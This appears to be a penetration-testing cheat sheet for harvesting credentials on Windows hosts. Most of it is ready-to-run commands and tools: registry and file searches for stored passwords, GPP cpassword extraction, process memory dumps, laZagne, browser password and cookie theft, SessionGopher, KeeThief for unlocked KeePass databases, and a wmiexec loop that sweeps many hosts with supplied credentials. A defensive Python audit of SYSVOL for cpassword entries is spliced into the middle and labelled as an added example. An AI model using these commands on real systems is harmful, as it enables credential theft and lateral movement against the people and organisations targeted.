
Password Mining

Metasploit

run post/windows/gather/credentials/credential_collector
clipboard_get_data (extapi)

Clipboard

Get-clipboard
cmdkey /list
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si <passw> *.xml *.ini *.txt *.vbs *.cmd *.ps1 *.bat *.inf *.eml

Sysprep / GPP

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend
%WINDIR%\Panther
%WINDIR%\System32\Sysprep
scanner/smb/smb_enum_gpp
findstr /S cpassword %logonserver%\sysvol\*.xml
Get-GPPPasswords.ps1
post/windows/gather/credentials/gpp
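A defender-side audit of the same GPP files the findstr one-liner above searches, written here as an added example (not code from the original page): it walks a SYSVOL copy, parses each XML file and reports every element that still carries a cpassword attribute, separating entries already cleared (empty value) from ones still holding a credential. The directory layout, the sample Groups.xml and the helper names are constructed for the example.

```python
"""Audit a SYSVOL copy for Group Policy Preference XML that still carries a cpassword
attribute. Added example; the tree layout and file contents below are constructed."""
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed Groups.xml in GPP format; the cpassword value is a placeholder,
# not a real encrypted credential.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin">
    <Properties action="U" userName="LocalAdmin" cpassword="PLACEHOLDER=="/>
  </User>
  <User name="Helpdesk">
    <Properties action="U" userName="Helpdesk" cpassword=""/>
  </User>
</Groups>
"""

def find_cpassword(root_dir):
    """Walk root_dir and report every XML element carrying a cpassword attribute."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # malformed XML: skip it rather than abort the audit
            for elem in tree.iter():
                if "cpassword" in elem.attrib:
                    findings.append({
                        "file": path,
                        "element": elem.tag,
                        "user": elem.attrib.get("userName", ""),
                        "has_value": bool(elem.attrib["cpassword"]),  # empty => already cleared
                    })
    return findings

def build_sample_sysvol():
    """Create a throwaway tree shaped like SYSVOL\\Policies\\<GUID>\\Machine\\Preferences\\Groups."""
    base = tempfile.mkdtemp()
    gpp_dir = os.path.join(base, "Policies", "{GUID}", "Machine", "Preferences", "Groups")
    os.makedirs(gpp_dir)
    with open(os.path.join(gpp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    return base
```

Point `find_cpassword` at a real SYSVOL copy and any finding with `has_value` set is a GPP item whose cpassword still needs to be removed from the policy.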

Process dump

procdump.exe -accepteula -ma <process_name/pid> <out.dmp>
strings <out.dmp>
Out-minidump (Get-Process -Id <pid>)

Invoke-mimikittenz.ps1

Registry

Get-ItemProperty <registry_key>
reg query <registry_key>
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP
reg query HKCU\Software\SimonTatham\PuTTY\Sessions
reg query HKLM\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKCU\Software\TightVNC\Server
reg query HKLM /f passw /t REG_SZ /s
reg query HKCU /f passw /t REG_SZ /s

AutoLogon

Get-RegistryAutoLogon

post/windows/gather/credentials/windows_autologin

Config files (PowerUp)

Get-SiteListPassword
Get-WebConfig

PowerShell

type C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

laZagne

laZagne.exe all

Browser passwords

SharpWeb.exe all

Chrome passwords and cookies

Tip: In all cases, Chrome must be shut down when you collect clear-text passwords, and the tool must be run in the context of the targeted user.

CookieMonster

CookieMonster creds
CookieMonster.exe cookies [-d <domain>] -e
CookieMonster -a

Firefox passwords

post/multi/gather/firefox_creds
mkdir 61f7vbl2.default
cd 61f7vbl2.default
mv /root/.msf4/loot/20190808160816_default_172.16.1.5_ff.61f7vbl2.cert_864640.bin cert9.db
mv /root/.msf4/loot/20190808160827_default_172.16.1.5_ff.61f7vbl2.cook_132753.bin cookies.sqlite
mv /root/.msf4/loot/20190808160840_default_172.16.1.5_ff.61f7vbl2.key4_423309.bin key4.db
/opt/firefox_decrypt/firefox_decrypt.py ../61f7vbl2.default/

Remote Access tools

Invoke-SessionGopher extracts saved session information for WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop.

Invoke-SessionGopher -Thorough

Invoke-SessionGopher -AllDomain [-u <domain>\<user>] [-p <password>]
Invoke-SessionGopher -iL <computerlist.txt> [-u <domain>\<user>] [-p <password>]

Invoke-SessionGopher -Target <computername> -Thorough

KeePass

Info: This works when KeePass is running and the database is unlocked. It does not need administrator privileges.

Resources

Detect KeePass

tasklist | findstr /I keepass
Get-Process keepass

List workstations running KeePass from an RCE (WMI)

for ip in $(cat <list_ip.txt>); do wmiexec.py <username>:<password>@$ip 'tasklist | findstr /I keepass' | grep -i keepass 1>/dev/null && echo "[+] Found KeePass process on $ip"; done

Attack

PowerShell

Import-Module KeeThief.ps1
Get-KeePassDatabaseKey -Verbose

Copy both files into the same directory on the target workstation and run the binary.

Tip: If KeePass requires a key file, a Windows user account, or both, use KeePatched.exe.

mRemoteNG parser

Info: The script mRemoteNG_parser.py takes confCons.xml as input.